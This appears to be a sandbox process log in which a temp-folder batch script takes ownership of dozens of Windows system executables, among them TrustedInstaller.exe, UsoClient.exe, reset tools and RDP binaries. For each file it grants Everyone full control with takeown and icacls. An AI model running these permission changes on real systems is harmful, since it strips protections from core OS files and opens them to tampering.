C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetPluginHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetPluginHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\ResetPluginHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\sysreset.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\sysreset.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-sysreset_31bf3856ad364e35_10.0.22000.469_none_3765148c03bcc3ce\f\sysreset.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\ResetEngine.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\ResetEngine.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\ResetEngine.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\SysResetErr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\SysResetErr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\SysResetErr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\systemreset.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\systemreset.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\f\systemreset.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpinit.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpinit.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpinit.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpshell.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpshell.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..-remoteapplications_31bf3856ad364e35_10.0.22000.282_none_3d368ddb21bde8c7\f\rdpshell.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..ces-workspacebroker_31bf3856ad364e35_10.0.22000.282_none_8a68951ea6251dba\f\wkspbroker.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..ces-workspacebroker_31bf3856ad364e35_10.0.22000.282_none_8a68951ea6251dba\f\wkspbroker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..ces-workspacebroker_31bf3856ad364e35_10.0.22000.282_none_8a68951ea6251dba\f\wkspbroker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpinit.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpinit.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpinit.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpshell.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpshell.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.22000.282_none_1a017429cb7fea2c\f\rdpshell.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lipboardredirection_31bf3856ad364e35_10.0.22000.376_none_fd0b376d9072c88a\f\rdpclip.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lipboardredirection_31bf3856ad364e35_10.0.22000.376_none_fd0b376d9072c88a\f\rdpclip.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lipboardredirection_31bf3856ad364e35_10.0.22000.376_none_fd0b376d9072c88a\f\rdpclip.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lishing-wmiprovider_31bf3856ad364e35_10.0.22000.282_none_305eac6918e57702\f\rdpsign.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lishing-wmiprovider_31bf3856ad364e35_10.0.22000.282_none_305eac6918e57702\f\rdpsign.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..lishing-wmiprovider_31bf3856ad364e35_10.0.22000.282_none_305eac6918e57702\f\rdpsign.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_4902a165a673e741\f\mstsc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_4902a165a673e741\f\mstsc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_4902a165a673e741\f\mstsc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_b61f094deaec819e\f\RdpSaUacHelper.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_b61f094deaec819e\f\RdpSaUacHelper.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_b61f094deaec819e\f\RdpSaUacHelper.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.65_none_f3a35be8937453f0\f\TabTip.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.65_none_f3a35be8937453f0\f\TabTip.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.65_none_f3a35be8937453f0\f\TabTip.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-diagnostics_31bf3856ad364e35_10.0.22000.469_none_3fa2439425626f6e\f\TpmDiagnostics.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-diagnostics_31bf3856ad364e35_10.0.22000.469_none_3fa2439425626f6e\f\TpmDiagnostics.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-diagnostics_31bf3856ad364e35_10.0.22000.469_none_3fa2439425626f6e\f\TpmDiagnostics.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_f9601eae71d90785\f\TpmTool.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_f9601eae71d90785\f\TpmTool.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_f9601eae71d90785\f\TpmTool.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-trustedinstaller_31bf3856ad364e35_10.0.22000.469_none_8c502cfed26c810b\f\TrustedInstaller.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-trustedinstaller_31bf3856ad364e35_10.0.22000.469_none_8c502cfed26c810b\f\TrustedInstaller.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-trustedinstaller_31bf3856ad364e35_10.0.22000.469_none_8c502cfed26c810b\f\TrustedInstaller.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_6ec3ffab3ec4b07b\f\LaunchWinApp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_6ec3ffab3ec4b07b\f\LaunchWinApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_6ec3ffab3ec4b07b\f\LaunchWinApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..-client-aggregators_31bf3856ad364e35_10.0.22000.318_none_701008567a383b30\f\AggregatorHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..-client-aggregators_31bf3856ad364e35_10.0.22000.318_none_701008567a383b30\f\AggregatorHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..-client-aggregators_31bf3856ad364e35_10.0.22000.318_none_701008567a383b30\f\AggregatorHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..client-decoder-host_31bf3856ad364e35_10.0.22000.318_none_1e08617dd1895eb7\f\UtcDecoderHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..client-decoder-host_31bf3856ad364e35_10.0.22000.318_none_1e08617dd1895eb7\f\UtcDecoderHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..client-decoder-host_31bf3856ad364e35_10.0.22000.318_none_1e08617dd1895eb7\f\UtcDecoderHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\dtdump.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\dtdump.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\dtdump.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\runexehelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\runexehelper.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.22000.318_none_9b6af6ae8c0ac6cb\f\runexehelper.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..monotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_618940d4a376d501\f\MoNotificationUx.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..monotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_618940d4a376d501\f\MoNotificationUx.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..monotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_618940d4a376d501\f\MoNotificationUx.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..snotificationbroker_31bf3856ad364e35_10.0.22000.37_none_46638c67a45b1942\f\MusNotification.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..snotificationbroker_31bf3856ad364e35_10.0.22000.37_none_46638c67a45b1942\f\MusNotification.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..snotificationbroker_31bf3856ad364e35_10.0.22000.37_none_46638c67a45b1942\f\MusNotification.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.22000.282_none_345ca27cf9ce36c0\f\MusNotifyIcon.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.22000.282_none_345ca27cf9ce36c0\f\MusNotifyIcon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.22000.282_none_345ca27cf9ce36c0\f\MusNotifyIcon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-orchestratorcore_31bf3856ad364e35_10.0.22000.469_none_82154d2009b8e727\f\MoUsoCoreWorker.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-orchestratorcore_31bf3856ad364e35_10.0.22000.469_none_82154d2009b8e727\f\MoUsoCoreWorker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..te-orchestratorcore_31bf3856ad364e35_10.0.22000.469_none_82154d2009b8e727\f\MoUsoCoreWorker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_6f399112972db672\f\MusNotificationUx.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_6f399112972db672\f\MusNotificationUx.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.22000.282_none_6f399112972db672\f\MusNotificationUx.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.22000.434_none_ae734c6bf20696b6\f\djoin.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.22000.434_none_ae734c6bf20696b6\f\djoin.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.22000.434_none_ae734c6bf20696b6\f\djoin.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\f\UsoClient.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\f\UsoClient.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\f\UsoClient.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
